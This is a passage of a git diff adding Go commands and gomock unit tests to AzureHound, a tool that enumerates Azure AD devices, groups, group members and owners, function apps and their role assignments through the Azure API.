azure active directory devices...") + start := time.Now() + stream := listDevices(ctx, azClient) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listDevices(ctx context.Context, client client.AzureClient) <-chan interface{} { + out := make(chan interface{}) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(out) + count := 0 + for item := range client.ListAzureDevices(ctx, query.GraphParams{}) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing devices") + return + } else { + log.V(2).Info("found device", "device", item) + count++ + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZDevice, + Data: models.Device{ + Device: item.Ok, + TenantId: client.TenantInfo().TenantId, + TenantName: client.TenantInfo().DisplayName, + }, + }); !ok { + return + } + } + } + log.Info("finished listing all devices", "count", count) + }() + + return out +} diff --git a/cmd/list-devices_test.go b/cmd/list-devices_test.go new file mode 100644 index 0000000..a2a19ed --- /dev/null +++ b/cmd/list-devices_test.go @@ -0,0 +1,69 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListDevices(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + mockChannel := make(chan client.AzureResult[azure.Device]) + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListAzureDevices(gomock.Any(), gomock.Any()).Return(mockChannel) + + go func() { + defer close(mockChannel) + mockChannel <- client.AzureResult[azure.Device]{ + Ok: azure.Device{}, + } + mockChannel <- client.AzureResult[azure.Device]{ + Error: mockError, + } + mockChannel <- client.AzureResult[azure.Device]{ + Ok: azure.Device{}, + } + }() + + channel := listDevices(ctx, mockClient) + result := <-channel + if _, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } + + if _, ok := <-channel; ok { + t.Error("expected channel to close from an error result but it did not") + } +} diff --git a/cmd/list-function-app-role-assignments.go b/cmd/list-function-app-role-assignments.go new file mode 100644 index 0000000..66dc6fa --- /dev/null +++ b/cmd/list-function-app-role-assignments.go @@ -0,0 +1,136 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "path" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listFunctionAppRoleAssignment) +} + +var listFunctionAppRoleAssignment = &cobra.Command{ + Use: "function-app-role-assignments", + Long: "Lists Azure Function App Role Assignments", + Run: listFunctionAppRoleAssignmentImpl, + SilenceUsage: true, +} + +func listFunctionAppRoleAssignmentImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure function app role assignments...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + stream := listFunctionAppRoleAssignments(ctx, azClient, listFunctionApps(ctx, azClient, subscriptions)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listFunctionAppRoleAssignments(ctx context.Context, client client.AzureClient, functionApps <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), functionApps) { + if functionApp, ok := result.(AzureWrapper).Data.(models.FunctionApp); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating function app role assignments", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, functionApp.Id); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + var ( + functionAppRoleAssignments = models.AzureRoleAssignments{ + ObjectId: id, + } + count = 0 + ) + for item := range client.ListRoleAssignmentsForResource(ctx, id, "", "") { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing role assignments for this function app", "functionAppId", id) + } else { + roleDefinitionId := path.Base(item.Ok.Properties.RoleDefinitionId) + + functionAppRoleAssignment := models.AzureRoleAssignment{ + Assignee: item.Ok, + ObjectId: id, + RoleDefinitionId: roleDefinitionId, + } + log.V(2).Info("Found function app role asignment", "functionAppRoleAssignment", functionAppRoleAssignment) + count++ + functionAppRoleAssignments.RoleAssignments = append(functionAppRoleAssignments.RoleAssignments, functionAppRoleAssignment) + } + } + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZFunctionAppRoleAssignment, + Data: functionAppRoleAssignments, + }); !ok { + return + } + log.V(1).Info("finished listing function app role assignments", "functionAppId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all function app role assignments") + }() + + return out +} diff --git a/cmd/list-function-apps.go b/cmd/list-function-apps.go new file mode 100644 index 0000000..a055412 --- /dev/null +++ b/cmd/list-function-apps.go @@ -0,0 +1,129 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listFunctionAppsCmd) +} + +var listFunctionAppsCmd = &cobra.Command{ + Use: "function-apps", + Long: "Lists Azure Function Apps", + Run: listFunctionAppsCmdImpl, + SilenceUsage: true, +} + +func listFunctionAppsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure function apps...") + start := time.Now() + stream := listFunctionApps(ctx, azClient, listSubscriptions(ctx, azClient)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listFunctionApps(ctx context.Context, client client.AzureClient, subscriptions <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + for result := range pipeline.OrDone(ctx.Done(), subscriptions) { + if subscription, ok := result.(AzureWrapper).Data.(models.Subscription); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating function apps", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, subscription.SubscriptionId); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + count := 0 + for item := range client.ListAzureFunctionApps(ctx, id) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing function apps for this subscription", "subscriptionId", id) + } else { + functionApp := models.FunctionApp{ + FunctionApp: item.Ok, + SubscriptionId: "/subscriptions/" + id, + ResourceGroupId: item.Ok.ResourceGroupId(), + ResourceGroupName: item.Ok.ResourceGroupName(), + TenantId: client.TenantInfo().TenantId, + } + if functionApp.Kind == "functionapp" { + log.V(2).Info("found function app", "functionApp", functionApp) + count++ + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZFunctionApp, + Data: functionApp, + }); !ok { + return + } + } + } + } + log.V(1).Info("finished listing function apps", "subscriptionId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all function apps") + }() + + return out +} diff --git a/cmd/list-group-members.go b/cmd/list-group-members.go new file mode 100644 index 0000000..330fbac --- /dev/null +++ b/cmd/list-group-members.go @@ -0,0 +1,142 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listGroupMembersCmd) + listGroupMembersCmd.Flags().StringSliceVar(&listGroupMembersSelect, "select", []string{"id,displayName,createdDateTime"}, `Select properties to include. Use "" for Azure default properties. Azurehound default is "id,displayName,createdDateTime" if flag is not supplied.`) +} + +var listGroupMembersCmd = &cobra.Command{ + Use: "group-members", + Long: "Lists Azure AD Group Members", + Run: listGroupMembersCmdImpl, + SilenceUsage: true, +} + +var listGroupMembersSelect []string + +func listGroupMembersCmdImpl(cmd *cobra.Command, _ []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure group members...") + start := time.Now() + stream := listGroupMembers(ctx, azClient, listGroups(ctx, azClient)) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listGroupMembers(ctx context.Context, client client.AzureClient, groups <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + params = query.GraphParams{ + Select: unique(listGroupMembersSelect), + Filter: "", + Count: false, + Search: "", + Top: 0, + Expand: "", + } + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), groups) { + if group, ok := result.(AzureWrapper).Data.(models.Group); !ok { + log.Error(fmt.Errorf("failed group type assertion"), "unable to continue enumerating group members", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, group.Id); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + var ( + data = models.GroupMembers{ + GroupId: id, + } + count = 0 + ) + for item := range client.ListAzureADGroupMembers(ctx, id, params) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing members for this group", "groupId", id) + } else { + groupMember := models.GroupMember{ + Member: item.Ok, + GroupId: id, + } + log.V(2).Info("found group member", "groupMember", groupMember) + count++ + data.Members = append(data.Members, groupMember) + } + } + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZGroupMember, + Data: data, + }); !ok { + return + } + log.V(1).Info("finished listing group memberships", "groupId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing members for all groups") + }() + + return out +} diff --git a/cmd/list-group-members_test.go b/cmd/list-group-members_test.go new file mode 100644 index 0000000..495d28f --- /dev/null +++ b/cmd/list-group-members_test.go @@ -0,0 +1,102 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "encoding/json" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListGroupMembers(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockGroupsChannel := make(chan interface{}) + mockGroupMemberChannel := make(chan client.AzureResult[json.RawMessage]) + mockGroupMemberChannel2 := make(chan client.AzureResult[json.RawMessage]) + + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListAzureADGroupMembers(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockGroupMemberChannel).Times(1) + mockClient.EXPECT().ListAzureADGroupMembers(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockGroupMemberChannel2).Times(1) + channel := listGroupMembers(ctx, mockClient, mockGroupsChannel) + + go func() { + defer close(mockGroupsChannel) + mockGroupsChannel <- AzureWrapper{ + Data: models.Group{}, + } + mockGroupsChannel <- AzureWrapper{ + Data: models.Group{}, + } + }() + go func() { + defer close(mockGroupMemberChannel) + mockGroupMemberChannel <- client.AzureResult[json.RawMessage]{ + Ok: json.RawMessage{}, + } + mockGroupMemberChannel <- client.AzureResult[json.RawMessage]{ + Ok: json.RawMessage{}, + } + }() + go func() { + defer close(mockGroupMemberChannel2) + mockGroupMemberChannel2 <- client.AzureResult[json.RawMessage]{ + Ok: json.RawMessage{}, + } + mockGroupMemberChannel2 <- client.AzureResult[json.RawMessage]{ + Error: mockError, + } + }() + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if data, ok := wrapper.Data.(models.GroupMembers); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.GroupMembers{}) + } else if len(data.Members) != 2 { + t.Errorf("got %v, want %v", len(data.Members), 2) + } + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if data, ok := wrapper.Data.(models.GroupMembers); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.GroupMembers{}) + } else if len(data.Members) != 1 { + t.Errorf("got %v, want %v", len(data.Members), 1) + } +} diff --git a/cmd/list-group-owners.go b/cmd/list-group-owners.go new file mode 100644 index 0000000..2db015b --- /dev/null +++ b/cmd/list-group-owners.go @@ -0,0 +1,132 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listGroupOwnersCmd) +} + +var listGroupOwnersCmd = &cobra.Command{ + Use: "group-owners", + Long: "Lists Azure AD Group Owners", + Run: listGroupOwnersCmdImpl, + SilenceUsage: true, +} + +func listGroupOwnersCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure group owners...") + start := time.Now() + stream := listGroupOwners(ctx, azClient, listGroups(ctx, azClient)) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listGroupOwners(ctx context.Context, client client.AzureClient, groups <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + params = query.GraphParams{} + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), groups) { + if group, ok := result.(AzureWrapper).Data.(models.Group); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating group owners", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, group.Id); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + var ( + groupOwners = models.GroupOwners{ + GroupId: id, + } + count = 0 + ) + for item := range client.ListAzureADGroupOwners(ctx, id, params) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing owners for this group", "groupId", id) + } else { + groupOwner := models.GroupOwner{ + Owner: item.Ok, + GroupId: id, + } + log.V(2).Info("found group owner", "groupOwner", groupOwner) + count++ + groupOwners.Owners = append(groupOwners.Owners, groupOwner) + } + } + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZGroupOwner, + Data: groupOwners, + }); !ok { + return + } + log.V(1).Info("finished listing group owners", "groupId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all group owners") + }() + + return out +} diff --git a/cmd/list-group-owners_test.go b/cmd/list-group-owners_test.go new file mode 100644 index 0000000..57e8536 --- /dev/null +++ b/cmd/list-group-owners_test.go @@ -0,0 +1,102 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "encoding/json" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListGroupOwners(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockGroupsChannel := make(chan interface{}) + mockGroupOwnerChannel := make(chan client.AzureResult[json.RawMessage]) + mockGroupOwnerChannel2 := make(chan client.AzureResult[json.RawMessage]) + + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListAzureADGroupOwners(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockGroupOwnerChannel).Times(1) + mockClient.EXPECT().ListAzureADGroupOwners(gomock.Any(), gomock.Any(), gomock.Any()).Return(mockGroupOwnerChannel2).Times(1) + channel := listGroupOwners(ctx, mockClient, mockGroupsChannel) + + go func() { + defer close(mockGroupsChannel) + mockGroupsChannel <- AzureWrapper{ + Data: models.Group{}, + } + mockGroupsChannel <- AzureWrapper{ + Data: models.Group{}, + } + }() + go func() { + defer close(mockGroupOwnerChannel) + mockGroupOwnerChannel <- client.AzureResult[json.RawMessage]{ + Ok: json.RawMessage{}, + } + mockGroupOwnerChannel <- client.AzureResult[json.RawMessage]{ + Ok: json.RawMessage{}, + } + }() + go func() { + defer close(mockGroupOwnerChannel2) + mockGroupOwnerChannel2 <- client.AzureResult[json.RawMessage]{ + Ok: json.RawMessage{}, + } + mockGroupOwnerChannel2 <- client.AzureResult[json.RawMessage]{ + Error: mockError, + } + }() + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if data, ok := wrapper.Data.(models.GroupOwners); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.GroupOwners{}) + } else if len(data.Owners) != 2 { + t.Errorf("got %v, want %v", len(data.Owners), 2) + } + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if data, ok := wrapper.Data.(models.GroupOwners); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.GroupOwners{}) + } else if len(data.Owners) != 1 { + t.Errorf("got %v, want %v", len(data.Owners), 2) + } +} diff --git a/cmd/list-groups.go b/cmd/list-groups.go new file mode 100644 index 0000000..0031d39 --- /dev/null +++ b/cmd/list-groups.go @@ -0,0 +1,92 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listGroupsCmd) +} + +var listGroupsCmd = &cobra.Command{ + Use: "groups", + Long: "Lists Azure Active Directory Groups", + Run: listGroupsCmdImpl, + SilenceUsage: true, +} + +func listGroupsCmdImpl(cmd *cobra.Command, _ []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure active directory groups...") + start := time.Now() + stream := listGroups(ctx, azClient) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listGroups(ctx context.Context, client client.AzureClient) <-chan interface{} { + out := make(chan interface{}) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(out) + count := 0 + for item := range client.ListAzureADGroups(ctx, query.GraphParams{Filter: "securityEnabled eq true"}) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing groups") + return + } else { + log.V(2).Info("found group", "group", item) + count++ + group := models.Group{ + Group: item.Ok, + TenantId: client.TenantInfo().TenantId, + TenantName: client.TenantInfo().DisplayName, + } + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZGroup, + Data: group, + }); !ok { + return + } + } + } + log.Info("finished listing all groups", "count", count) + }() + + return out +} diff --git a/cmd/list-groups_test.go b/cmd/list-groups_test.go new file mode 100644 index 0000000..175a74e --- /dev/null +++ b/cmd/list-groups_test.go @@ -0,0 +1,70 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListGroups(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + mockChannel := make(chan client.AzureResult[azure.Group]) + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListAzureADGroups(gomock.Any(), gomock.Any()).Return(mockChannel) + + go func() { + defer close(mockChannel) + mockChannel <- client.AzureResult[azure.Group]{ + Ok: azure.Group{}, + } + mockChannel <- client.AzureResult[azure.Group]{ + Error: mockError, + } + mockChannel <- client.AzureResult[azure.Group]{ + Ok: azure.Group{}, + } + }() + + channel := listGroups(ctx, mockClient) + result := <-channel + if _, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } + + if _, ok := <-channel; ok { + t.Error("expected channel to close from an error result but it did not") + } +} diff --git a/cmd/list-key-vault-access-policies.go b/cmd/list-key-vault-access-policies.go new file mode 100644 index 0000000..31c8d79 --- /dev/null +++ b/cmd/list-key-vault-access-policies.go @@ -0,0 +1,130 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + kinds "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +var listKeyVaultAccessPoliciesCmd = &cobra.Command{ + Use: "key-vault-access-policies", + Long: "Lists Azure Key Vault Access Policies", + Run: listKeyVaultAccessPoliciesCmdImpl, + SilenceUsage: true, +} + +func init() { + config.Init(listKeyVaultAccessPoliciesCmd, []config.Config{config.KeyVaultAccessTypes}) + 